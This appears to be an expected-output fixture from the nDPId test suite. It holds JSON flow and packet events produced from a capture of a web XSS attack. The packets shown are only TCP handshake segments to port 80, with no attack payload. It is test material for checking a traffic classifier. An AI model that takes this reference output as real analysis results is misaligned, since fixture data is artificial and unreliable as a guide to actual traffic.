+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4044,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":2,"flow_last_seen":1499347452731,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347452731,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4AJ1f\/zHj+f6h6AScSApEQAAAgQFtAQCCAoD5JMQATrBmgEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":3,"flow_last_seen":1499347452732,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347452732,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Ox1AAD4GirusEAABwKgKMuACAFCP5\/qHdX\/8yIAQAOXIGAAAAQEICgE6wZoD5JMQ"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4061,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347455224,"flow_last_seen":1499347455224,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455224,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57372,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4061,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":1,"flow_last_seen":1499347455224,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347455224,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8z+5AAD4G9eGsEAABwKgKMuAcAFC7QQvkAAAAAKACchDyLAAAAgQFtAQCCAoBOsQKAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":2,"flow_last_seen":1499347455224,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347455224,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4BwGoR45u0EL5aAScSA0zgAAAgQFtAQCCAoD5JV\/ATrECgEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4063,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":3,"flow_last_seen":1499347455225,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347455225,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0z+9AAD4G9eisEAABwKgKMuAcAFC7QQvlBqEeOoAQAOXT1QAAAQEICgE6xAoD5JV\/"} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347320712,"flow_last_seen":1499347326706,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55942,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347320712,"flow_last_seen":1499347326706,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55942,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347323234,"flow_last_seen":1499347328706,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55968,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347323234,"flow_last_seen":1499347328706,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55968,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347324538,"flow_last_seen":1499347329706,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55982,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347324538,"flow_last_seen":1499347329706,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55982,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347325777,"flow_last_seen":1499347331707,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55996,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347325777,"flow_last_seen":1499347331707,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347328298,"flow_last_seen":1499347333709,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56022,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347328298,"flow_last_seen":1499347333709,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56022,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347329594,"flow_last_seen":1499347334709,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56036,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347329594,"flow_last_seen":1499347334709,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56036,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4073,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347456462,"flow_last_seen":1499347456462,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347456462,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57386,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4073,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":1,"flow_last_seen":1499347456462,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347456462,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8YWdAAD4GZGmsEAABwKgKMuAqAFCeBqRYAAAAAKACchB1sAAAAgQFtAQCCAoBOsU\/AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4074,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":2,"flow_last_seen":1499347456462,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347456462,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4CoPzfb\/ngakWaAScSDVKAAAAgQFtAQCCAoD5Ja1ATrFPwEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4075,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":3,"flow_last_seen":1499347456463,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347456463,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0YWhAAD4GZHCsEAABwKgKMuAqAFCeBqRZD833AIAQAOV0MAAAAQEICgE6xT8D5Ja1"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4085,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347457705,"flow_last_seen":1499347457705,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347457705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57400,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4085,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":1,"flow_last_seen":1499347457705,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347457705,"pkt":"ABm5CmnxAMGxFOsxCABFAAA816NAAD4G7iysEAABwKgKMuA4AFCwfBHVAAAAAKACchD0eAAAAgQFtAQCCAoBOsZ2AAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4086,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":2,"flow_last_seen":1499347457705,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347457705,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4DiBhHFpsHwR1qAScSBmmgAAAgQFtAQCCAoD5JfrATrGdgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4087,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":3,"flow_last_seen":1499347457706,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347457706,"pkt":"ABm5CmnxAMGxFOsxCABFAAA016RAAD4G7jOsEAABwKgKMuA4AFCwfBHWgYRxaoAQAOUFogAAAQEICgE6xnYD5Jfr"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4103,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347460253,"flow_last_seen":1499347460253,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347460253,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57426,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4103,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":1,"flow_last_seen":1499347460253,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347460253,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eW5AAD4GTGKsEAABwKgKMuBSAFDnp7GdAAAAAKACchAa7gAAAgQFtAQCCAoBOsjzAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4104,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":2,"flow_last_seen":1499347460253,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347460253,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4FLH4MUu56exnqAScSDwcAAAAgQFtAQCCAoD5JpoATrI8wEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4105,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":3,"flow_last_seen":1499347460254,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347460254,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0eW9AAD4GTGmsEAABwKgKMuBSAFDnp7Gex+DFL4AQAOWPeAAAAQEICgE6yPMD5Jpo"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4115,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347461508,"flow_last_seen":1499347461508,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347461508,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57440,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4115,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":1,"flow_last_seen":1499347461508,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347461508,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80JNAAD4G9TysEAABwKgKMuBgAFDZtRq+AAAAAKACchC+dwAAAgQFtAQCCAoBOsotAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4116,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":2,"flow_last_seen":1499347461508,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347461508,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4GAaiodM2bUav6AScSB9+QAAAgQFtAQCCAoD5JuiATrKLQEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4117,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":3,"flow_last_seen":1499347461509,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347461509,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00JRAAD4G9UOsEAABwKgKMuBgAFDZtRq\/GoqHTYAQAOUdAQAAAQEICgE6yi0D5Jui"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4130,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347462759,"flow_last_seen":1499347462759,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347462759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57454,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4130,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":1,"flow_last_seen":1499347462759,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347462759,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8K55AAD4GmjKsEAABwKgKMuBuAFAjB+D7AAAAAKACchCtogAAAgQFtAQCCAoBOstlAAAAAAEDAwc="} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4131,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":2,"flow_last_seen":1499347462759,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347462759,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4G52KJeXIwfg\/KAScSAAAgAAAgQFtAQCCAoD5JzbATrLZQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4132,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":3,"flow_last_seen":1499347462760,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347462760,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0K59AAD4GmjmsEAABwKgKMuBuAFAjB+D8diiXmIAQAOWfCAAAAQEICgE6y2YD5Jzb"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4145,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347465304,"flow_last_seen":1499347465304,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465304,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57480,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4145,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":1,"flow_last_seen":1499347465304,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347465304,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8nSBAAD4GKLCsEAABwKgKMuCIAFBo61DCAAAAAKACchD1YAAAAgQFtAQCCAoBOs3iAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":2,"flow_last_seen":1499347465304,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347465304,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4Ijwu80MaOtQw6AScSCVOwAAAgQFtAQCCAoD5J9XATrN4gEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4147,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":3,"flow_last_seen":1499347465305,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347465305,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0nSFAAD4GKLesEAABwKgKMuCIAFBo61DD8LvNDYAQAOU0QwAAAQEICgE6zeID5J9X"} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347332137,"flow_last_seen":1499347337710,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56062,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347332137,"flow_last_seen":1499347337710,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56062,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347333419,"flow_last_seen":1499347338710,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56076,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347333419,"flow_last_seen":1499347338710,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56076,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 